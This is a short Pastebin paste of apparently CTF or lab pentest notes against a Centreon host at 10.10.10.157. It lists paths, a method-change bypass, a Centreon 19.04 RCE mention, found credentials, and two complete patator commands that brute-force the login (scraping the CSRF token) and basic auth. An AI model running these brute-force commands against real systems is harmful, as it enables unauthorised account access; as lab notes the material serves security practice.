Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /monitoring -> bypass par changement de method http
- /centreon
- /server-status -> access refused
- aa.php
- panel.php
- centreon v 19.04 avec rce
- brute force avec contournement csrf:
- patator http_fuzz --threads=10 url="http://10.10.10.157/centreon/index.php" method=POST body='useralias=FILE0&password=FILE1&submitLogin=Connect¢reon_token=_CSRF_' header="Cookie: PHPSESSID=${SESSIONID}" 0=user.txt 1=UserPass follow=0 accept_cookie=1 before_urls="http://10.10.10.157/centreon/index.php" before_header="Cookie: PHPSESSID=${SESSIONID}" before_egrep='_CSRF_:name="centreon_token" type="hidden" value="(\w+)" />' -x ignore:fgrep="Your credentials are incorrect."
- credz found :
- admin:passwd
- admin:!@#$%^
- monitoring:passwd
- monitoring:!@#$%^
- brute force authent basic :
- patator http_fuzz auth_type=basic url=http://10.10.10.157/monitoring user_pass=FILE0:FILE1 0=./UserPass 1=./UserPass -x ignore:code=401 -t 15
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement